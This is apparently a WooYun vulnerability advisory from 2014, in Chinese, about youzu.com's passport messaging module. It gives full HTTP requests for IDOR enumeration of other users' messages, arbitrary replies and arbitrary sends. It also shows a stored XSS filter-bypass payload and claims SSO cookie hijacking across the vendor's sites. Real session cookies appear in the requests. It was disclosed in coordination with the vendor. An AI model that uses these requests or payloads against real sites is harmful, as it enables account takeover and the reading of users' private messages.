当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088469

漏洞标题:两个漏洞劫持所有游族网络会员账号

相关厂商:上海游族网络股份有限公司

漏洞作者: Forever80s

提交时间:2014-12-24 18:05

修复时间:2015-02-07 18:06

公开时间:2015-02-07 18:06

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-24: 细节已通知厂商并且等待厂商处理中
2014-12-29: 厂商已经确认,细节仅向厂商公开
2015-01-08: 细节向核心白帽子及相关领域专家公开
2015-01-18: 细节向普通白帽子公开
2015-01-28: 细节向实习白帽子公开
2015-02-07: 细节向公众公开

简要描述:

详细说明:

漏洞证明:

1、会员消息模块多处平行权限漏洞
接收消息

POST /messages/getMessageInfo HTTP/1.1
Host: passport.youzu.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://passport.youzu.com/messages/index
Content-Length: 10
Cookie: __utma=166915638.999324100.1419312277.1419312277.1419400811.2; __utmz=166915638.1419312277.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_f61970e1ce8b3758b866572e28e07fba=1419312278,1419400279; PHPSESSID=0pt5ppco1coc2t1cc2o435k9k3; Hm_lpvt_f61970e1ce8b3758b866572e28e07fba=1419400897; uuzu_reg_sms_code=448251090916; uuzu_UAUTH=UXUOPlM1Wm1VYAQ8U2YNTgAdADIAUgZUAUsNLwUVCn8GagppUHFWYl1mB2wAMABmAzVRblQ4UhxcFQ1mU1QCVFFNDilTGVp3VTgEPFMkDWcAMABhAGcGdQFoDSIFZQpsBh8KGlBnVlZdWQdPACgARgMnUW5UYVJyXCsNN1N9AnNRdw4%2FUyZaZFU4BE9TVg1QAD8ATQBPBlkBNA0ZBQwKYwYuCg5QE1ZaXWEHTwAFAE4DYVEKVDFSEVxqDRtTSgJFUTEOClM5WllVfQRbU28NXAA5AFsAXAZRATINGAUMCmQGOwoZUC1WTV04B1gAPABFAzxRHVQdUmlcZg1wU28CZFFpDjRTaVomVWEEdFNwDWcAJwBrAGcGbgE7DRsFGQo1Bmo%3D; uuzu_UNICKNAME=txxxx; uuzu_external_account=tstxxx; __utmb=166915638.4.9.1419400901170; __utmc=166915638; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
pmid=17187
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 24 Dec 2014 06:08:02 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.23
Set-Cookie: uuzu_UAUTH=V3MBMVo8UGdQZVhgAzYKSVpHUGIDUQBSB00MLlRECn8NYVo5ACEBNVJpVzxRYV07WmwFOghkAE5WH102UlVTBVdLASZaEFB9UD1YYAN0CmBaalAxA2QAcwduDCNUNApsDRRaSgA3AQFSVlcfUXldG1p%2BBToIPQAgViFdZ1J8UyJXcQEwWi9QblA9WBMDBgpXWmVQHQNMAF8HMgwYVF0KYw0lWl4AQwENUm5XH1FUXRNaOAVeCG0AQ1ZgXUtSS1MUVzcBBVowUFNQeFgHAz8KW1pjUAsDXwBXBzQMGVRdCmQNMFpJAH0BGlI3VwhRbV0YWmUFSQhBADtWbF0gUm5TNVdvATtaYFAsUGRYKAMgCmBafVA7A2QAaAc9DBpUSAo1DWE%3D; path=/; domain=.youzu.com
Set-Cookie: uuzu_UNICKNAME=txxx; path=/; domain=.youzu.com
Content-Length: 753
{"status":1,"msg":"<p>\n\t\t\t\t\t\u4eb2\u7231\u7684<span>xiaoqiang27good<\/span>\uff1a\n\t\t\t\t<\/p>\n\t\t\t\t<p style=\"text-indent:20.25pt;\">\n\t\t\t\t\t\u751f\u65e5\u5feb\u4e50\uff01\u611f\u8c22\u60a8\u4e00\u76f4\u4ee5\u6765\u5bf9\u6e38\u65cf\u7684\u652f\u6301\uff0c\u6e38\u65cf\u5e0c\u671b\u60a8\u5728\u672a\u6765\u7684\u4e00\u5e74\u91cc\uff0c\u60a8\u7684\u6bcf\u4e00\u4e2a\u5fc3\u613f\u90fd\u80fd\u5b9e\u73b0\uff0c\u6bcf\u4e00\u4efd\u575a\u6301\u90fd\u6709\u6536\u83b7\u3002\u6e38\u65cf\u613f\u65f6\u523b\u4e0e\u60a8\u5206\u4eab\u7b80\u5355\u7684\u5feb\u4e50\uff01\n\t\t\t\t<\/p>\n\t\t\t\t<p style=\"text-align:right;\">\n\t\t\t\t\t<span style=\"margin-right:35px;\">\u6e38\u65cf\u7f51\u7edc \u00a02014\/05\/01<\/span>\n\t\t\t\t<\/p>\n\t\t\t\t"}


更改请求pmid数字即可获取其他会员的消息,此处可以穷举所有会员名字。例如xiaoqiang27good
另外回复消息平行权限漏洞

POST /messages/reply HTTP/1.1
Host: passport.youzu.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://passport.youzu.com/messages/replyeditor/pmid/19691/to/%3Csvg/onload=console.log(1)
Content-Length: 56
Cookie: __utma=166915638.999324100.1419312277.1419312277.1419400811.2; __utmz=166915638.1419312277.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_f61970e1ce8b3758b866572e28e07fba=1419312278,1419400279; PHPSESSID=0pt5ppco1coc2t1cc2o435k9k3; Hm_lpvt_f61970e1ce8b3758b866572e28e07fba=1419401436; uuzu_reg_sms_code=448251090916; uuzu_UAUTH=BCBaagZgUWZSZwI6WG1YGwcaW2kBUwRWAkgKKFREBnMGag5tUXADNwE6VzwAMFo8VWMFOgRoD0FUHQ9kXFtXAQQYWn0GTFF8Uj8COlgvWDIHN1s6AWYEdwJrCiVUNAZgBh8OHlFmAwMBBVcfAChaHFVxBToEMQ8vVCMPNVxyVyYEIlprBnNRb1I%2FAklYXVgFBzhbFgFOBFsCNwoeVF0GbwYuDgpREgMPAT1XHwAFWhRVNwVeBGEPTFRiDxlcRVcQBGRaXgZsUVJSegJdWGRYCQc%2BWwABXQRTAjEKH1RdBmgGOw4dUSwDGAFkVwgAPFofVWoFSQRNDzRUbg9yXGBXMQQ8WmAGPFEtUmYCclh7WDIHIFswAWYEbAI4ChxUSAY5Bmo%3D; uuzu_UNICKNAME=tsxxx; uuzu_external_account=txxx; __utmb=166915638.8.9.1419401436913; __utmc=166915638; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
pmid=19690&to=%26lt%3Bsvg&subject=0&message=sdfsdfsdfdsf


同样更改pmid可以向任意消息回复
因为发消息没有做任何验证,那么我们就可以向任何一个用户发消息,和向任意消息回复了
发消息

POST /messages/sendMsm HTTP/1.1
Host: passport.youzu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://passport.youzu.com/messages/smspop
Content-Length: 173
Cookie: __utma=166915638.558191048.1419392229.1419392229.1419399965.2; __utmz=166915638.1419392229.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_f61970e1ce8b3758b866572e28e07fba=1419392393,1419400227; __utmb=166915638.16.10.1419399965; __utmc=166915638; Hm_lpvt_f61970e1ce8b3758b866572e28e07fba=1419400654; __utmt=1; uuzu_UAUTH=BSFcbFI0BjEANVFpV19YBFVAVz0GVwRVVRcIKQERAXkDH1t%2FA0lSO1NOV29XIFo%2FBDwGagJrVT5VN1s9VVEHUgUSXGpSDAYLABVRLldLWClVS1cvBkMEMVUfCG4BegFiAzFbZgNrUn1TbVcmVztaCAQABkICYlUKVQVbRVVyB0gFLlxPUi8GEQBjURlXO1h1VXZXNAZ9BHFVJQg8AS4BZwNvW0gDUFJNUzdXH1drWgAELwZJAk1VAVU%2FW09VTAduBWRcW1ICBg0AYVEOV2xYFlVxVxsGSgRmVTsICgEIAWQDKFtIAzZSXlNqVx1XQloYBC4GXgJeVTBVYltOVXIHQAUjXExSZwYKADlRGVdHWG5VO1dzBm8EZlU7CDcBYQElAzZbcAN2UmlTd1c7V2laPwRqBkkCS1VuVW8%3D; uuzu_UNICKNAME=axxxx; uuzu_external_account=aaxx
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
account=目标用户名&message=xxxxx&from=xxxx


2、消息xss过滤绕过
发送如下消息

POST /messages/sendMsm HTTP/1.1
Host: passport.youzu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://passport.youzu.com/messages/smspop
Content-Length: 100
Cookie: __utma=166915638.558191048.1419392229.1419392229.1419399965.2; __utmz=166915638.1419392229.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_f61970e1ce8b3758b866572e28e07fba=1419392393,1419400227; __utmb=166915638.16.10.1419399965; __utmc=166915638; Hm_lpvt_f61970e1ce8b3758b866572e28e07fba=1419400654; __utmt=1; uuzu_UAUTH=BSFcbFI0BjEANVFpV19YBFVAVz0GVwRVVRcIKQERAXkDH1t%2FA0lSO1NOV29XIFo%2FBDwGagJrVT5VN1s9VVEHUgUSXGpSDAYLABVRLldLWClVS1cvBkMEMVUfCG4BegFiAzFbZgNrUn1TbVcmVztaCAQABkICYlUKVQVbRVVyB0gFLlxPUi8GEQBjURlXO1h1VXZXNAZ9BHFVJQg8AS4BZwNvW0gDUFJNUzdXH1drWgAELwZJAk1VAVU%2FW09VTAduBWRcW1ICBg0AYVEOV2xYFlVxVxsGSgRmVTsICgEIAWQDKFtIAzZSXlNqVx1XQloYBC4GXgJeVTBVYltOVXIHQAUjXExSZwYKADlRGVdHWG5VO1dzBm8EZlU7CDcBYQElAzZbcAN2UmlTd1c7V2laPwRqBkkCS1VuVW8%3D; uuzu_UNICKNAME=axxx; uuzu_external_account=axxx
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
account=tste323&message="/><svg/onload=console.log(1)><"\"&from="/><svg/onmouseover=console.log(1) "


构成xss 移动鼠标触发

msg_xss_Capture.PNG


因为是单点登录,所以用cookie即可登陆所有系统

cookie_login_Capture.PNG


包括U币,paypal等等电子货币,危害之大你们晓得。
这里只poc

修复方案:

版权声明:转载请注明来源 Forever80s@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-12-29 16:40

厂商回复:

我们马上会安排进行修改调整的

最新状态:

暂无